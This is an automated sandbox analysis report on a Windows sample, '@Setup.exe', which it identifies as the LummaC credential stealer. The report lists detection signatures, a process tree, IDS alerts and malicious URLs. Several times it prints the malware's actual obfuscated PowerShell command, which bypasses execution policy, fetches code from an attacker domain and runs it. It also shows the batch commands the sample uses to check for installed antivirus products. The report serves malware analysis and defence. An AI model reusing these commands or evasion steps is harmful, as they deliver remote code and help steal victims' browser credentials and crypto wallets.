Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
@Setup.exe

Overview

General Information

Sample name:@Setup.exe
Analysis ID:1582040
MD5:c6f709a40a7d35051ee49ad1e367df65
SHA1:da1b6b9d9471644dc2ff198a4f392c374d4508bb
SHA256:cfef95129d9fd21cf9fdec5d1332cde09a7eb16144edf7867c0b398d5f67b036
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • @Setup.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\@Setup.exe" MD5: C6F709A40A7D35051EE49AD1E367DF65)
    • cmd.exe (PID: 6376 cmdline: "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2196 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6120 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 404 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3756 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 280 cmdline: cmd /c md 504701 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 4484 cmdline: extrac32 /Y /E Cc MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2044 cmdline: findstr /V "Housewares" Expressions MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5964 cmdline: cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5180 cmdline: cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Corporation.com (PID: 3448 cmdline: Corporation.com u MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 6468 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp (PID: 2916 cmdline: "C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
            • 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
              • 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp (PID: 3332 cmdline: "C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
                • timeout.exe (PID: 6724 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 7084 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 2792 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3396 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3384 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4108 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 2696 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 6520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5304 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5224 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3176 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1716 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4116 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5080 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3300 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5016 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 944 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5696 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • BrightLib.exe (PID: 3612 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
      • choice.exe (PID: 1804 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6468, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3756, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:36:43.883961+010020283713Unknown Traffic192.168.2.449739104.21.32.1443TCP
      2024-12-29T16:36:45.933152+010020283713Unknown Traffic192.168.2.449740104.21.32.1443TCP
      2024-12-29T16:36:48.355991+010020283713Unknown Traffic192.168.2.449742104.21.32.1443TCP
      2024-12-29T16:36:50.668514+010020283713Unknown Traffic192.168.2.449743104.21.32.1443TCP
      2024-12-29T16:36:52.791981+010020283713Unknown Traffic192.168.2.449744104.21.32.1443TCP
      2024-12-29T16:36:55.581095+010020283713Unknown Traffic192.168.2.449745104.21.32.1443TCP
      2024-12-29T16:36:57.678094+010020283713Unknown Traffic192.168.2.449746104.21.32.1443TCP
      2024-12-29T16:37:00.671379+010020283713Unknown Traffic192.168.2.449747104.21.32.1443TCP
      2024-12-29T16:37:04.245538+010020283713Unknown Traffic192.168.2.449748104.21.32.1443TCP
      2024-12-29T16:37:07.586861+010020283713Unknown Traffic192.168.2.449749185.161.251.21443TCP
      2024-12-29T16:37:09.772266+010020283713Unknown Traffic192.168.2.449750104.21.37.128443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:36:44.615833+010020546531A Network Trojan was detected192.168.2.449739104.21.32.1443TCP
      2024-12-29T16:36:46.721563+010020546531A Network Trojan was detected192.168.2.449740104.21.32.1443TCP
      2024-12-29T16:37:05.187085+010020546531A Network Trojan was detected192.168.2.449748104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:36:44.615833+010020498361A Network Trojan was detected192.168.2.449739104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:36:46.721563+010020498121A Network Trojan was detected192.168.2.449740104.21.32.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:37:10.699695+010020084381A Network Trojan was detected104.21.37.128443192.168.2.449750TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-29T16:36:58.495118+010020480941Malware Command and Control Activity Detected192.168.2.449746104.21.32.1443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://cegu.shop/8574262446/ph.txtAvira URL Cloud: Label: malware
      Source: https://klipvumisui.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeReversingLabs: Detection: 13%
      Source: @Setup.exeVirustotal: Detection: 23%Perma Link
      Source: @Setup.exeReversingLabs: Detection: 15%
      Source: @Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: @Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2076653655.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2078181481.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2076153750.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
